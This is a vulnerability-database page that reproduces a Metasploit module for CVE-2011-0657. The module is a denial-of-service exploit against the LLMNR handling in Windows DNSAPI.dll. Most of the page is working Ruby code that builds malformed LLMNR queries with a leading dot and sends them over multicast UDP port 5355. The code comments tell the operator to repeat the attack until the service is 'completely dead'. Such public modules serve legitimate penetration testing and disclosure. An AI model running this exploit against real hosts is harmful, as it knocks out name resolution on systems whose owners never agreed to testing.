Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by jduck, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 157 Views

Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS vulnerabilit

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2011-0657	29 May 201815:50	–	circl
Check Point Advisories	Microsoft DNS Resolution LLMNR Query Remote Code Execution (MS11-030; CVE-2011-0657)	4 Apr 201100:00	–	checkpoint_advisories
CVE	CVE-2011-0657	13 Apr 201118:00	–	cve
Cvelist	CVE-2011-0657	13 Apr 201118:00	–	cvelist
Tenable Nessus	MS11-030: Vulnerability in DNS Resolution Could Allow Remote Code Execution (2509553) (remote check)	21 Apr 201100:00	–	nessus
Tenable Nessus	MS11-030: Vulnerability in DNS Resolution Could Allow Remote Code Execution (2509553)	13 Apr 201100:00	–	nessus
Metasploit	Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS	27 Jun 201101:17	–	metasploit
NVD	CVE-2011-0657	13 Apr 201118:55	–	nvd
OpenVAS	Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553)	13 Apr 201100:00	–	openvas
OpenVAS	Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553)	13 Apr 201100:00	–	openvas

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
  
def initialize  
super(  
'Name' => 'Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS',  
'Description' => %q{  
This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll  
as distributed with Windows Vista and later without KB2509553. By sending a  
specially crafted LLMNR query, containing a leading '.' character, an attacker  
can trigger stack exhaustion or potentially cause stack memory corruption.  
  
Although this vulnerability may lead to code execution, it has not been proven  
to be possible at the time of this writing.  
  
NOTE: In some circumstances, a '.' may be found before the top of the stack is  
reached. In these cases, this module may not be able to cause a crash.  
},  
'Author' => 'jduck',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-0657' ],  
[ 'OSVDB', '71780' ],  
[ 'MSB', 'MS11-030' ]  
],  
'DisclosureDate' => 'Apr 12 2011')  
  
register_options(  
[  
Opt::RPORT(5355),  
Opt::RHOST('224.0.0.252')  
])  
end  
  
def make_query(str)  
pkt = ""  
  
# id  
pkt << [rand(65535)].pack('n')  
  
# flags  
pkt << [(  
'0' + # qr  
'0000' + # opcode  
'0' + # conflict  
'0' + # truncation  
'0' + # tentative  
'0000' + # zero (reserved)  
'0000' # rcode  
)].pack('B16')  
  
# counts  
pkt << [1,0,0,0].pack('n*')  
  
if str[0,1] == "."  
pkt << [str.length].pack('C')  
end  
pkt << str + "\x00"  
  
# type / class (PTR/IN)  
pkt << [0x0c, 0x01].pack('n*')  
  
pkt  
end  
  
  
def run  
connect_udp  
  
# query  
  
# various compressed queries  
#pkt << "\x03" + ("%d" % 192)  
#pkt << "\x03" + "144" + "\x01" + "0" + "\x03" + "168" + "\x03" + "192"  
#pkt << ("\x01" + '1') * 0x20  
#pkt << "\x01" + '.'  
#pkt << ("\x01\x2e") + "\x01" + "0"  
#pkt << "\x07" + 'in-addr' + "\x04" + 'arpa' + "\x00"  
#pkt << "\x03" + 'ip6' + "\x04" + 'arpa' + "\x00"  
#pkt << ".e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f".gsub('.', "\x01") + "\x03ip6\x04arpa\x00"  
  
pkt = make_query(".1.1.ip6.arpa")  
print_status("Sending Ipv6 LLMNR query to #{rhost}")  
udp_sock.put(pkt)  
  
pkt = make_query(".1.1.in-addr.arpa")  
print_status("Sending Ipv4 LLMNR query to #{rhost}")  
udp_sock.put(pkt)  
  
print_status("Note, in a default configuration, the service will restart automatically twice.")  
print_status("In order to ensure it is completely dead, wait up to 5 minutes and run it again.")  
  
disconnect_udp  
end  
end  
`

31 Aug 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 27.5

CVSS 3.19.8

EPSS0.46929

SSVC